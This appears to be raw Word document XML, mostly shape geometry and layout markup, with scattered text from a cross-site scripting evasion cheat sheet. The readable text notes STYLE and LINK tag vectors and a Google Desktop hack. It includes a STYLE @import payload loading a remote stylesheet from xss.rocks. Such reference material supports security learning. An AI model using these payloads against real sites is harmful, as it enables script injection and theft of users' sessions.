                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5351 4713"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5348 4713"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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Text Box 810"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4712" y="107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&lt;STYLE&gt;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9" o:spid="_x0000_s1623" style="position:absolute;left:0;text-align:left;margin-left:235.65pt;margin-top:5.35pt;width:32.85pt;height:9.15pt;z-index:-17584128;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4713,107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">
                <v:shape id="Freeform 811" o:spid="_x0000_s1624" style="position:absolute;left:4712;top:107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Z5ksQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKveluc6hJdJVSKFisB6OCx0f2&#10;mQSzb0N21fTfdwXB4zAz3zDz5WBbcaXeN441vE8UCOLSmYYrDfvd9zgF4QOywdYxafgjD8vFy2iO&#10;uXE33tK1CJWIEPY5aqhD6HIpfVmTRT9xHXH0Tq63GKLsK2l6vEW4bWWi1Ie02HBcqLGjr5rKc3Gx&#10;GkKRHlTiS1uh+vXrTbL+OWZTrd9eh88ZiEBDeIYf7ZXRkKoM7m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2eZLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m635,182r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,289;21,289;18,289;0,268;0,265;0,128;21,107;635,107;656,128;656,268;638,289;635,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 810" o:spid="_x0000_s1625" type="#_x0000_t202" style="position:absolute;left:4712;top:107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RnMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgjetql7EK1GEVFYEMTaPexxbMY2&#10;2ExqE7X77zcHwePjfS9WvW3EgzpvHCsYJykI4tJpw5WCn2L3OQXhA7LGxjEp+CMPq+XgY4GZdk/O&#10;6XEKlYgh7DNUUIfQZlL6siaLPnEtceQurrMYIuwqqTt8xnDbyK80nUiLhmNDjS1taiqvp7tVsP7l&#10;fGtuh/Mxv+SmKGYp7ydXpUbDfj0HEagPb/HL/a0VTMdxfjwTj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4kZzBAAAA3A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&lt;STYLE&gt;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732864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4188460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="807" name="Freeform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3220" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 7146 6596"/>
                            <a:gd name="T1" fmla="*/ T0 w 572"/>
                            <a:gd name="T2" fmla="+- 0 289 107"/>
                            <a:gd name="T3" fmla="*/ 289 h 183"/>
                            <a:gd name="T4" fmla="+- 0 6617 6596"/>
                            <a:gd name="T5" fmla="*/ T4 w 572"/>
                            <a:gd name="T6" fmla="+- 0 289 107"/>
                            <a:gd name="T7" fmla="*/ 289 h 183"/>
                            <a:gd name="T8" fmla="+- 0 6614 6596"/>
                            <a:gd name="T9" fmla="*/ T8 w 572"/>
                            <a:gd name="T10" fmla="+- 0 289 107"/>
                            <a:gd name="T11" fmla="*/ 289 h 183"/>
                            <a:gd name="T12" fmla="+- 0 6596 6596"/>
                            <a:gd name="T13" fmla="*/ T12 w 572"/>
                            <a:gd name="T14" fmla="+- 0 268 107"/>
                            <a:gd name="T15" fmla="*/ 268 h 183"/>
                            <a:gd name="T16" fmla="+- 0 6596 6596"/>
                            <a:gd name="T17" fmla="*/ T16 w 572"/>
                            <a:gd name="T18" fmla="+- 0 265 107"/>
                            <a:gd name="T19" fmla="*/ 265 h 183"/>
                            <a:gd name="T20" fmla="+- 0 6596 6596"/>
                            <a:gd name="T21" fmla="*/ T20 w 572"/>
                            <a:gd name="T22" fmla="+- 0 128 107"/>
                            <a:gd name="T23" fmla="*/ 128 h 183"/>
                            <a:gd name="T24" fmla="+- 0 6617 6596"/>
                            <a:gd name="T25" fmla="*/ T24 w 572"/>
                            <a:gd name="T26" fmla="+- 0 107 107"/>
                            <a:gd name="T27" fmla="*/ 107 h 183"/>
                            <a:gd name="T28" fmla="+- 0 7146 6596"/>
                            <a:gd name="T29" fmla="*/ T28 w 572"/>
                            <a:gd name="T30" fmla="+- 0 107 107"/>
                            <a:gd name="T31" fmla="*/ 107 h 183"/>
                            <a:gd name="T32" fmla="+- 0 7167 6596"/>
                            <a:gd name="T33" fmla="*/ T32 w 572"/>
                            <a:gd name="T34" fmla="+- 0 128 107"/>
                            <a:gd name="T35" fmla="*/ 128 h 183"/>
                            <a:gd name="T36" fmla="+- 0 7167 6596"/>
                            <a:gd name="T37" fmla="*/ T36 w 572"/>
                            <a:gd name="T38" fmla="+- 0 268 107"/>
                            <a:gd name="T39" fmla="*/ 268 h 183"/>
                            <a:gd name="T40" fmla="+- 0 7149 6596"/>
                            <a:gd name="T41" fmla="*/ T40 w 572"/>
                            <a:gd name="T42" fmla="+- 0 289 107"/>
                            <a:gd name="T43" fmla="*/ 289 h 183"/>
                            <a:gd name="T44" fmla="+- 0 7146 6596"/>
                            <a:gd name="T45" fmla="*/ T44 w 572"/>
                            <a:gd name="T46" fmla="+- 0 289 107"/>
                            <a:gd name="T47" fmla="*/ 289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572" h="183">
                              <a:moveTo>
                                <a:pt x="550" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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550" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="571" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="571" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="553" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="550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141B7" id="Freeform 808" o:spid="_x0000_s1026" style="position:absolute;margin-left:329.8pt;margin-top:5.35pt;width:28.6pt;height:9.15pt;z-index:-1758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" path="m550,182r-529,l18,182,,161r,-3l,21,21,,550,r21,21l571,161r-18,21l550,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="349250,183515;13335,183515;11430,183515;0,170180;0,168275;0,81280;13335,67945;349250,67945;362585,81280;362585,170180;351155,183515;349250,183515" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works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above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instead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rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>&lt;LINK&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag).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slight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>variation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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>was</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6067"/>
        </w:tabs>
        <w:spacing w:before="76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33376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4281170</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="804" name="Group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6742" y="82"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="805" name="Freeform 807"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6741" y="82"/>
                            <a:ext cx="742" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7462 6742"/>
                              <a:gd name="T1" fmla="*/ T0 w 742"/>
                              <a:gd name="T2" fmla="+- 0 264 82"/>
                              <a:gd name="T3" fmla="*/ 264 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6763 6742"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 264 82"/>
                              <a:gd name="T7" fmla="*/ 264 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6760 6742"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 264 82"/>
                              <a:gd name="T11" fmla="*/ 264 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6742 6742"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 243 82"/>
                              <a:gd name="T15" fmla="*/ 243 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6742 6742"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 240 82"/>
                              <a:gd name="T19" fmla="*/ 240 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6742 6742"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 103 82"/>
                              <a:gd name="T23" fmla="*/ 103 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6763 6742"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 82 82"/>
                              <a:gd name="T27" fmla="*/ 82 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7462 6742"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 82 82"/>
                              <a:gd name="T31" fmla="*/ 82 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7483 6742"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 103 82"/>
                              <a:gd name="T35" fmla="*/ 103 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7483 6742"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 243 82"/>
                              <a:gd name="T39" fmla="*/ 243 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7465 6742"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 264 82"/>
                              <a:gd name="T43" fmla="*/ 264 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7462 6742"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 264 82"/>
                              <a:gd name="T47" fmla="*/ 26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Text Box 806"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6741" y="82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4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&lt;/STYLE&gt;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5" o:spid="_x0000_s1626" style="position:absolute;left:0;text-align:left;margin-left:337.1pt;margin-top:4.1pt;width:37.1pt;height:9.15pt;z-index:-17583104;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6742,82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">
                <v:shape id="Freeform 807" o:spid="_x0000_s1627" style="position:absolute;left:6741;top:82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ibFMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE74W+w3IK3kjdjWCxqZtQCqItgvjzAIfs&#10;aRLMng3ZNYlv3xUKvRxm5htmnY+2ET11vnasIZkrEMSFMzWXGi7nzcsKhA/IBhvHpOFOHvLsabLG&#10;1LiBj9SfQikihH2KGqoQ2lRKX1Rk0c9dSxy9H9dZDFF2pTQdDhFuG7lQ6lVarDkuVNjSZ0XF9XSz&#10;GrZf+8aPF9zZM74l34er2vczpfX0efx4BxFoDP/hv/bOaFipJTz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2JsUxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,264;21,264;18,264;0,243;0,240;0,103;21,82;720,82;741,103;741,243;723,264;720,264" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 806" o:spid="_x0000_s1628" type="#_x0000_t202" style="position:absolute;left:6741;top:82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Q6rsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5rUw6Jbo0hREITSdXvo8XXz&#10;3A1uXtZN1O2/bwoFj8PMfMMs14NrxY36YD1reJkqEMSVN5ZrDZ/l7nkOIkRkg61n0vBDAdar0dMS&#10;c+PvXNDtGGuRIBxy1NDE2OVShqohh2HqO+LknXzvMCbZ19L0eE9w18qZUpl0aDktNNjRW0PV+Xh1&#10;GjZfXGzt5f37ozgVtiwXig/ZWevJeNi8gog0xEf4v703GuYqg78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hDqu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4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&lt;/STYLE&gt;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used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hack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Desktop.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side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>note,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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remove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end</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>immediately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>after</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="658"/>
      </w:pPr>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector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close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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useful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cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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either</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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equals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sign</w:t>
      </w:r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slash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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack,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come</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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  <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>once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real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>world:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="12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8921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119380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2669540" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="801" name="Group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9540" cy="116205"/>
                          <a:chOff x="1614" y="188"/>
                          <a:chExt cx="4204" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="802" name="Freeform 804"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="188"/>
                            <a:ext cx="4204" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5797 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4204"/>
                              <a:gd name="T2" fmla="+- 0 370 188"/>
                              <a:gd name="T3" fmla="*/ 370 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4204"/>
                              <a:gd name="T6" fmla="+- 0 370 188"/>
                              <a:gd name="T7" fmla="*/ 370 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4204"/>
                              <a:gd name="T10" fmla="+- 0 370 188"/>
                              <a:gd name="T11" fmla="*/ 370 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4204"/>
                              <a:gd name="T14" fmla="+- 0 349 188"/>
                              <a:gd name="T15" fmla="*/ 349 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4204"/>
                              <a:gd name="T18" fmla="+- 0 346 188"/>
                              <a:gd name="T19" fmla="*/ 346 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4204"/>
                              <a:gd name="T22" fmla="+- 0 209 188"/>
                              <a:gd name="T23" fmla="*/ 209 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4204"/>
                              <a:gd name="T26" fmla="+- 0 188 188"/>
                              <a:gd name="T27" fmla="*/ 188 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5797 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4204"/>
                              <a:gd name="T30" fmla="+- 0 188 188"/>
                              <a:gd name="T31" fmla="*/ 188 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5818 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4204"/>
                              <a:gd name="T34" fmla="+- 0 209 188"/>
                              <a:gd name="T35" fmla="*/ 209 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5818 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4204"/>
                              <a:gd name="T38" fmla="+- 0 349 188"/>
                              <a:gd name="T39" fmla="*/ 349 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5800 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4204"/>
                              <a:gd name="T42" fmla="+- 0 370 188"/>
                              <a:gd name="T43" fmla="*/ 370 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5797 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4204"/>
                              <a:gd name="T46" fmla="+- 0 370 188"/>
                              <a:gd name="T47" fmla="*/ 37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204" h="183">
                                <a:moveTo>
                                  <a:pt x="418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183" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4186" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418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88"/>
                            <a:ext cx="420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&lt;STYLE&gt;@import'</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId28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http://xss.rocks/xss.css';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&lt;/STYL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2" o:spid="_x0000_s1629" style="position:absolute;margin-left:80.7pt;margin-top:9.4pt;width:210.2pt;height:9.15pt;z-index:-15627264;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,188" coordsize="420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">
                <v:shape id="Freeform 804" o:spid="_x0000_s1630" style="position:absolute;left:1614;top:188;width:4204;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="420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VIdcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjUNHUVYpFaCgIVRF6e2af&#10;SWj2bdhdk/jvXaHgcZiZb5jluje1aMn5yrKCyTgBQZxbXXGh4HjYjuYgfEDWWFsmBTfysF69DJaY&#10;atvxD7X7UIgIYZ+igjKEJpXS5yUZ9GPbEEfvYp3BEKUrpHbYRbip5TRJZtJgxXGhxIY2JeV/+6tR&#10;sPjdzXabojt9f55uLju3Wcb5m1Kvw/7jHUSgPjzD/+0vrWCeTOFxJh4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NUh1xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4183,182l21,182r-3,l,161r,-3l,21,21,,4183,r21,21l4204,161r-18,21l4183,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4183,370;21,370;18,370;0,349;0,346;0,209;21,188;4183,188;4204,209;4204,349;4186,370;4183,370" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 803" o:spid="_x0000_s1631" type="#_x0000_t202" style="position:absolute;left:1614;top:188;width:420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OZNsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AKvdXEFsSuRhGpUChI1+3B43Pz&#10;3A1uXtZN1PXfN4LgcZiZb5jpvHeNOFMXrGcNw4ECQVx6Y7nS8Fes3sYgQkQ22HgmDVcKMJ89P00x&#10;M/7COZ03sRIJwiFDDXWMbSZlKGtyGAa+JU7e3ncOY5JdJU2HlwR3jXxXaiQdWk4LNba0rKk8bE5O&#10;w2LL+Zc9rne/+T63RfGp+Gd00Pr1pV9MQETq4yN8b38bDWP1Abcz6Qj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85k2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&lt;STYLE&gt;@import'</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId29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http://xss.rocks/xss.css';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&lt;/STYL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E&gt;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Remote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3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26" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="13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33888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4296410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>335915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1867535" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="798" name="Group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7535" cy="116205"/>
                          <a:chOff x="6766" y="529"/>
                          <a:chExt cx="2941" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="799" name="Freeform 801"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6766" y="528"/>
                            <a:ext cx="2941" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9685 6766"/>
                              <a:gd name="T1" fmla="*/ T0 w 2941"/>
                              <a:gd name="T2" fmla="+- 0 711 529"/>
                              <a:gd name="T3" fmla="*/ 711 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6787 6766"/>
                              <a:gd name="T5" fmla="*/ T4 w 2941"/>
                              <a:gd name="T6" fmla="+- 0 711 529"/>
                              <a:gd name="T7" fmla="*/ 711 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6784 6766"/>
                              <a:gd name="T9" fmla="*/ T8 w 2941"/>
                              <a:gd name="T10" fmla="+- 0 710 529"/>
                              <a:gd name="T11" fmla="*/ 710 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6766 6766"/>
                              <a:gd name="T13" fmla="*/ T12 w 2941"/>
                              <a:gd name="T14" fmla="+- 0 690 529"/>
                              <a:gd name="T15" fmla="*/ 690 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6766 6766"/>
                              <a:gd name="T17" fmla="*/ T16 w 2941"/>
                              <a:gd name="T18" fmla="+- 0 687 529"/>
                              <a:gd name="T19" fmla="*/ 687 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6766 6766"/>
                              <a:gd name="T21" fmla="*/ T20 w 2941"/>
                              <a:gd name="T22" fmla="+- 0 550 529"/>
                              <a:gd name="T23" fmla="*/ 550 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6787 6766"/>
                              <a:gd name="T25" fmla="*/ T24 w 2941"/>
                              <a:gd name="T26" fmla="+- 0 529 529"/>
                              <a:gd name="T27" fmla="*/ 529 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9685 6766"/>
                              <a:gd name="T29" fmla="*/ T28 w 2941"/>
                              <a:gd name="T30" fmla="+- 0 529 529"/>
                              <a:gd name="T31" fmla="*/ 529 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9706 6766"/>
                              <a:gd name="T33" fmla="*/ T32 w 2941"/>
                              <a:gd name="T34" fmla="+- 0 550 529"/>
                              <a:gd name="T35" fmla="*/ 550 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9706 6766"/>
                              <a:gd name="T37" fmla="*/ T36 w 2941"/>
